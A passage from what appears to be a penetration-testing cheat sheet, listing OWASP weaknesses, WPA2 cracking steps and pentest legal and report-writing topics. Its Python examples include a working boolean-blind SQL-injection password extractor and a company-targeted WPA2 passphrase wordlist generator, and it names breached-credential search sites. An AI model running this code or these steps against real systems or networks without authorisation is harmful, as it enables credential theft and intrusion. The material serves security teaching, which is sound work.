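        "Content-Type: text/html\r\n\r\n<html>")
HARDENED = ("HTTP/1.1 200 OK\r\n"
            "Server: nginx\r\n"
            "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
            "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
            "X-Content-Type-Options: nosniff\r\n"
            "Content-Type: text/html\r\n\r\n<html>")

if __name__ == "__main__":
    for name, raw in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(name, audit_headers(raw) or "OK")
```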
Session Fixation
Credential Stuffing
Brute Forcing or other automated attacks
Weak or well-known Passwords
Weak or Ineffective Credential Recovery
Weak forgot-password processes
Missing or Ineffective two-factor authentication
Session ID exposed in URL
knowledge-based answers
Does not rotate Session ID after successful login
Does not properly invalidate Session IDs during logout or inactivity
User Sessions or Authentication Tokens
Find all directories
Parameterized Statements
Sanitized Input
Blind SQL Injection
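The SQL Injection nodes above list parameterized statements as the fix and blind SQL injection as a variant. The following Python is an added example for this cheat sheet (not code from the page or from any tool it names): the vulnerable string-built login beside the parameterized one, and a boolean-based blind extraction that uses the vulnerable login purely as a yes/no oracle to recover a password one character at a time. It runs against an in-memory SQLite table with constructed users.

```python
"""SQL injection: string-built query vs parameterized query, plus boolean-based blind extraction.
Added example for this cheat sheet; the users table is constructed."""
import sqlite3
import string


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "S3cret!", "admin"), ("bob", "hunter2", "user")])  # constructed
    return con


def login_vulnerable(con, username: str, password: str):
    # DON'T: user input spliced into the SQL text, so quotes and comments rewrite the query.
    sql = f"SELECT username, role FROM users WHERE username = '{username}' AND password = '{password}'"
    return con.execute(sql).fetchone()


def login_safe(con, username: str, password: str):
    # DO: placeholders. The driver binds the values; input can never change the query grammar.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def blind_extract_password(con, target_user: str, max_len: int = 16) -> str:
    """Boolean-based blind SQLi: the app only says logged-in / not logged-in, but that one bit
    per query is enough to leak target_user's password character by character."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in string.printable.strip():
            if ch == "'":          # would close the probe's own literal; skipped for this demo
                continue
            probe = f"{target_user}' AND substr(password,{pos},1)='{ch}' --"
            if login_vulnerable(con, probe, "x"):
                recovered += ch
                break
        else:
            break                  # no character matched: end of the password
    return recovered


def demo():
    """Classic comment-out bypass against both logins: (vulnerable result, safe result)."""
    con = _db()
    payload_user, payload_pass = "alice' --", "anything"
    return login_vulnerable(con, payload_user, payload_pass), login_safe(con, payload_user, payload_pass)


if __name__ == "__main__":
    print(demo())                                   # (('alice', 'admin'), None)
    print(blind_extract_password(_db(), "alice"))   # S3cret!
```

Note that the blind extraction makes a few hundred requests for a seven-character password, which is why it shows up plainly in web server logs (the "Track failed login attempts" node under Insufficient Logging & Monitoring).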
Attacking Systems that parse XML Input
Abuse the SYSTEM entity to get malicious results
DoS, local file disclosure, remote code execution, and more
User gets access to somewhere they shouldn't
Are you able to bypass access ?
unauthenticated, authenticated, admin
Can you access admin areas or even other user areas from an account ?
IDOR - Insecure Direct Object Reference
Default Credentials
Stack Traces - Error Handling
Unnecessary features
Out-of-date Software
Unnecessary ports open, activated accounts
Disclosure of Sensitive Information
Application should not throw errors
Left behind applications
Default features not in use
Deprecated Interface
File upload
Left behind directories
Reflected XSS
Stored XSS
DOM XSS
Client-side
Server-side
Preventing XSS
Encoding
Filtering
Validating
Sanitization
Serialization
Deserialization
ysoserial
No Patching, no fix, no update
Software is vulnerable, unsuported, or out of date
No frequent scan for vulnerabilities
Have Logs, Auditable Events
Track anyone logging into the application
Track failed login attempts
Monitor if anyone is attacking your application
Serialization
Walk around
Rogue Devices
Guest Network
No password
Separation of networks
Reduced functionalities
Access employees' devices / IPs / servers
How well is the network segmented
Hacking Process
Place wireless card in monitor mode
Discover info about network
Select network and capture data
Perform Deauth attack
Capture WPA handshake
Attempt to crack the handshake
Strength evaluation
Channel
BSSID
Speed-up the process
WPS
Company Name
Phone numbers
Street address
Create a wordlist from their website
WPA2 PSK
Substitute 1 with i. 0 with O
Many companies use
something familiar to them
CEWL
Weak Passwords
rockyou.txt
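The WPA2 PSK cracking nodes above say to build the wordlist from the company's own material (name, phone numbers, street address, website words), with the 1/i and 0/O substitutions that people use to "strengthen" a familiar word. The following Python is an added example for this cheat sheet, not CeWL and not code from the page: a crude page scrape plus a mangler that produces candidates, filtering to the 8..63 character range a WPA2 passphrase must have so no cracking time is spent on impossible entries. The sample page and the suffix list are constructed.

```python
"""Targeted WPA2-PSK wordlist: scrape words and phone numbers, then mangle them.
Added example for this cheat sheet; the sample page and suffixes are constructed."""
import re

LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}


def leet_variants(word: str):
    """Original, fully leet-substituted, and the single 1<->i / 0<->O swaps people actually use."""
    yield word
    yield "".join(LEET.get(c, c) for c in word.lower())
    yield word.replace("i", "1").replace("I", "1")
    yield word.replace("o", "0").replace("O", "0")


def case_variants(word: str):
    yield word.lower()
    yield word.capitalize()
    yield word.upper()


def generate_psk_candidates(words, suffixes=("", "!", "1", "123", "2023", "2024"),
                            min_len=8, max_len=63):
    """Mangle words into passphrase candidates; WPA2 PSKs are 8..63 chars so drop the rest."""
    base = set()
    for w in words:
        w = re.sub(r"[^A-Za-z0-9]", "", w)
        for cv in case_variants(w):
            base.update(leet_variants(cv))
    seen, out = set(), []
    for b in sorted(base):
        for suf in suffixes:
            cand = b + suf
            if min_len <= len(cand) <= max_len and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def words_from_page(html_text: str, min_word_len: int = 5):
    """CeWL-style scrape: alphabetic tokens of min_word_len+ letters, plus phone-number digit runs."""
    words = set(re.findall(r"[A-Za-z]{%d,}" % min_word_len, html_text))
    digits_only = re.sub(r"[\s()\-]", "", html_text)        # "(555) 123-4567" -> "5551234567"
    phones = set(re.findall(r"\d{7,}", digits_only))
    return sorted(words | phones)


# Constructed sample page; not a real company.
SAMPLE_PAGE = """<h1>Acme Corporation</h1>
<p>Call us on (555) 123-4567 at 100 Main Street. Our mascot is the Roadrunner.</p>"""


def demo():
    return generate_psk_candidates(words_from_page(SAMPLE_PAGE))


if __name__ == "__main__":
    for cand in demo():
        print(cand)
```

Feed the output to aircrack-ng or hashcat ahead of rockyou.txt: the targeted list is tiny, so it costs seconds, and it is where "something familiar to them" passphrases land.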
Channel 1, 6 and 11 are the most used
(no overlap)
SSID
Open network
Hidden networks
Evaluate what networks are around
Legal Documents
and Report Writing
Sales
https://www.youtube.com/watch?v=EOoBAq6z4Zk
'How to' video
on writing a pentest report
https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report Sample Pentest Report
https://github.com/trustedsec/physical-docs
Legal Documentation
for Physical Security Testing
scylla.sh
leakedsource.ru
scylla.sh
email:*bbc.co.uk
email:username*
Before you test
After you test
Rules of Engagement (ROE)
Findings Report
Mutual Non-Disclosure Agreement (NDA)
Master Service Agreement (MSA)
Statement of Work (SOW)
Others: Sample Report, Recommendation Letters etc..
Common Legal Documents
Performance Objectives
Outline the Responsibilities
Rapid7 MSA example
https://www.rapid7.com/legal/msa/
Activities
Deliverables
Timelines
Quotation
What we can and can't do
What we can and can't attack (IP addresses)
Will cover specifics of your testing
Common 'don'ts'
Denial of Service
Social Engineering
often set aside as its own assessment
unless that's a specific thing the client wants to test
You can not start your penetration test until the Rules of Engagement document is signed
It's a snapshot in time
Assessment Overview
(high level)
Assessments Components
We are not responsible for
anything happening after
We are under a time limited engagement
We are targeting what we can in that period of time
What we are attacking
What type of penetration test it is
Timeframe
Guidelines
Phases of Pentest
Planning
Discovery
Attacking
Reporting
Findings Severity Ratings
Scope
Scope Exclusions
No Denial of Service attacks
IPs
Client Allowances
Executive Summary
Technical Summary
Did the client have to assist us in any way?
C-level executive
CISO
CEO
Intended for people with no technical background
Share technical details
Intended for technical people
Attack Summary
Quick summary about vulnerabilities you found,
and what they could lead to
Actions
Recommendations
What you managed to do
Security Strengths
Security Weaknesses
Give them kudos where they need it
We were scanning
they identified and blocked us
Missing Multi-Factor Authentication
Weak Password Policy
Unrestricted Logon Attempts
Identify weaknesses at a high level
Non-technical people will understand
Charts
Vulnerabilities by Impact
Exploitation Proof of Concept
Chained exploit of attacks
References
Remediation
Who
Vector
Action
Additional Reports and Scans (Informational)